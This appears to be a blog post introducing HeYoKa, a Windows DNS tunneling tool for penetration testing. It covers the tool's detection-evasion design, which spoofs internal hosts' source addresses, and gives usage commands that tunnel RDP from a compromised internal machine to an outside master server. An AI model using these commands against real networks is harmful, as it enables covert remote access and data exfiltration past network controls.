DNS Tunneling: never so easy

Hi folks, today I tried for my first time HeYoKa. As you probably know utilizing Linux systems is pretty easy to build a DNS tunneling , faking up most of the captive portal around the globe, but what about windows ? Well, HeYoKa makes it easy.

Heyoka is a DNS tunneling tool aiming for both performance and stealth, released under the GPLv2.

The tunnel is up to 60% faster compared to existing tools, thanks to a different encoding that is used in the packets. Additionally, heyoka can spread traffic across multiple name servers and spoof the source addresses of other hosts within the network. This way, the traffic signature gets spread across the whole internal network, making the tunnel endpoint significantly harder to spot.

Heyoka is 100% written in C, which means that it runs natively without the need of interpreters installed on the machine, which is extremely useful in a penetration testing scenario.

The overall idea is to create a useful tunneling tool, and at the same time investigate new patterns of data exfiltration that use spoofed packets to avoid detection.

We presented heyoka at multiple conferences. Have a look at the slides from Shakacon if you want to get a bigger picture … or just download and try! :)

How do I get heyoka to run?

Start by running heyoka in master mode on the machine which is authoritative name server for the domain you are using. Assuming that you are going to contact some service listening on the other side (e.g.: RDP), the syntax will be as follows:

heyoka.exe -m -d mydomain.com -l -p 8080

This will start the fake DNS server, and create a local listening TCP socket on port 8080. Then start heyoka in slave mode on the internal/compromised machine with the following syntax:

heyoka.exe -s -d mydomain.com -p 3389

This will create the tunnel, and all you have to do is to fire off a RDP client and point it to the ‘master’ machine on port 8080.

If it’s the internal/compromised machine that needs to contact a service on the external box, simply use ‘-l’ (which stands for ‘listen’) on the master side instead. Keep in mind that the code is in alpha stage, so you might experience crashes and other unexpected behavior.